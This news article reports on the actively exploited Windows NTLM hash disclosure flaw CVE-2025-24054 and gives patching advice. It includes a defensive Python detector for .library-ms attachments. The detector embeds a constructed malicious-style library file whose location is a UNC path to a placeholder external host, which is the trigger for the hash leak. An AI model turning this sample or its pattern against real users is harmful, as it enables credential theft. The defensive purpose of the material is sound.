Windows Flaw CVE-2025-24054 Actively Exploited to Steal NTLM Passwords


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new Windows security flaw, CVE-2025-24054, to its Known Exploited Vulnerabilities (KEV) catalog. This means the vulnerability is currently being used in real-world cyberattacks.

This medium-severity vulnerability affects Microsoft Windows systems and allows hackers to steal NTLM password hashes simply by tricking a user into downloading or interacting with a malicious file. Although Microsoft rated it as “Exploitation Less Likely,” recent reports confirm that attackers have already started taking advantage of it.

What is CVE-2025-24054?

CVE-2025-24054 is an NTLM hash disclosure spoofing vulnerability in Microsoft Windows. It has a CVSS score of 6.5, marking it as a moderate but important threat. Microsoft patched this flaw in March 2025 during its regular Patch Tuesday updates.

The vulnerability involves NTLM (New Technology LAN Manager), an older authentication protocol used by Windows to verify user identities. Microsoft officially deprecated NTLM in favor of Kerberos, but many systems and applications still use it. This makes NTLM a favorite target for cybercriminals.

When exploited, this vulnerability allows hackers to perform NTLM spoofing attacks over a network, using specially crafted files that can trick Windows into sending sensitive password hashes to an attacker-controlled server.

How the Exploit Works

According to Microsoft, attackers can trigger this vulnerability using a file with the .library-ms extension. These files can be disguised as legitimate documents, making them easy to distribute via malspam (malicious email spam).

Victims only need to click once, right-click, or interact in any way with these malicious files for the exploit to activate. The files don’t even need to be opened or executed—just previewing them can be enough to leak NTLM password hashes.

Once these hashes are exposed, hackers can use them in pass-the-hash or relay attacks to gain unauthorized access to systems and move laterally across a network.

Active Attacks Have Already Begun

Cybersecurity firm Check Point confirmed that CVE-2025-24054 has been actively exploited since March 19, 2025. One of the first observed campaigns targeted government and private organizations in Poland and Romania.

In these attacks, threat actors sent emails containing a Dropbox link. This link led to a ZIP archive with malicious files exploiting CVE-2025-24054 and other known bugs. Simply downloading and extracting the ZIP file was enough to trigger the vulnerability and send the user’s NTLMv2 hashes to a remote server controlled by the attackers.

In some newer attacks observed as late as March 25, 2025, the file was delivered without compression, making it even easier to execute. The file was named “Info.doc.library-ms” and required minimal user interaction to launch the attack.

Check Point reports that at least 10 separate phishing campaigns have used this method to steal NTLM credentials since the vulnerability became known.


Similarities to Previous Exploits

CVE-2025-24054 is considered a variant of CVE-2024-43451, another NTLM-related flaw patched in November 2024. That vulnerability was also weaponized by threat groups like UAC-0194 and Blind Eagle in attacks on Ukraine and Colombia.

Like its predecessor, CVE-2025-24054 relies on exploiting SMB authentication requests, which are automatically triggered by Windows Explorer when interacting with certain file types. These requests can leak NTLM hashes to a remote server without any obvious warning to the user.

Why This Matters for Organizations

The ongoing exploitation of this NTLM spoofing vulnerability highlights several important cybersecurity lessons:

  • Minimal user action is required to trigger the exploit.

  • NTLM credentials are still widely used, even though the protocol is outdated.

  • Attackers are moving quickly, launching campaigns just days after the patch was released.

Once attackers obtain NTLM hashes, they can use them to gain unauthorized access, move laterally, and escalate privileges within compromised networks. This makes the vulnerability particularly dangerous for organizations that haven’t yet applied the patch.

What You Should Do Now

CISA has directed all Federal Civilian Executive Branch (FCEB) agencies to apply the patch for CVE-2025-24054 no later than May 8, 2025. However, all organizations—public and private—are strongly advised to take action immediately.

Here’s what IT teams should do:

  • Apply the latest Windows security patches released in March 2025.

  • Disable NTLM authentication where possible and switch to Kerberos.

  • Monitor file downloads and email attachments, especially those ending in .library-ms.

  • Educate users about the risks of phishing emails and suspicious files.

  • Use endpoint detection tools to identify and block malicious file behavior.
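The two monitoring bullets above (watch for .library-ms attachments, flag malicious file behaviour) can be turned into a small triage check. The following is an added example written for this article, not code from Microsoft, Check Point or CISA. It assumes that a crafted .library-ms file carries a library location that resolves to a remote host over SMB (the article only states that Explorer issues SMB authentication requests for such files; the Library Description XML schema itself is documented by Microsoft), and it flags the double-extension naming pattern the article quotes ("Info.doc.library-ms"). All names (`triage`, `Finding`, the sample files and the 203.0.113.10 address) are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List

# Locations that would make Explorer reach out to another host:
# a UNC path (\\host\share), an smb:// URL, or a file://host/... URL.
# file:///C:/... (three slashes) is a local path and is not matched.
REMOTE_LOCATION = re.compile(r"^(\\\\[^\\]+\\|smb://|file://(?!/))", re.IGNORECASE)

# Document-looking extensions that may be used to hide the real one.
DOC_LIKE = {"doc", "docx", "pdf", "xls", "xlsx", "ppt", "pptx", "txt"}


@dataclass
class Finding:
    """Hypothetical triage record for one attachment (constructed for this example)."""
    filename: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def is_disguised_name(filename: str) -> bool:
    """True for names such as 'Info.doc.library-ms' whose real extension is
    .library-ms but which show a document extension in front of it."""
    parts = filename.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "library-ms" and parts[-2] in DOC_LIKE


def remote_locations(xml_bytes: bytes) -> List[str]:
    """Return every <url> value in a Library Description file that points off-host.
    Tags are matched by local name so a missing or different namespace is tolerated."""
    root = ET.fromstring(xml_bytes)
    hits = []
    for el in root.iter():
        if el.tag.split("}")[-1] == "url":
            value = (el.text or "").strip()
            if REMOTE_LOCATION.match(value):
                hits.append(value)
    return hits


def triage(filename: str, content: bytes) -> Finding:
    """Flag a .library-ms attachment by name pattern and by remote library locations.
    Files with any other extension are passed through untouched."""
    finding = Finding(filename)
    if not filename.lower().endswith(".library-ms"):
        return finding
    if is_disguised_name(filename):
        finding.reasons.append("double extension disguises .library-ms as a document")
    try:
        for loc in remote_locations(content):
            finding.reasons.append(f"library location points to a remote host: {loc}")
    except ET.ParseError:
        finding.reasons.append("file is not well-formed Library Description XML")
    return finding


# Constructed sample: a harmless library pointing at a local folder.
BENIGN_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed sample: a library whose location is a UNC path to an external
# (TEST-NET, non-routable) address, the pattern a defender wants to catch.
SUSPICIOUS_LIBRARY = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Info</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


if __name__ == "__main__":
    for name, data in [("Documents.library-ms", BENIGN_LIBRARY),
                       ("Info.doc.library-ms", SUSPICIOUS_LIBRARY)]:
        result = triage(name, data)
        print(name, "->", "SUSPICIOUS" if result.suspicious else "ok", result.reasons)
```

Run it over an attachment quarantine folder or a mail-gateway hook; a hit on either reason is enough to hold the message, since the article notes that merely previewing or extracting such a file can trigger the SMB authentication request. The check is deliberately content-based rather than extension-only, so a renamed file that still parses as a library description with a remote location is caught as well.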

Final Thoughts

The active exploitation of CVE-2025-24054 shows that even medium-risk vulnerabilities can pose major threats if left unpatched. The simplicity of this attack—requiring almost no user interaction—makes it a serious concern for cybersecurity teams.

Organizations should treat this flaw as high-priority and patch their systems without delay. In today’s fast-moving threat landscape, even small oversights can lead to big breaches.
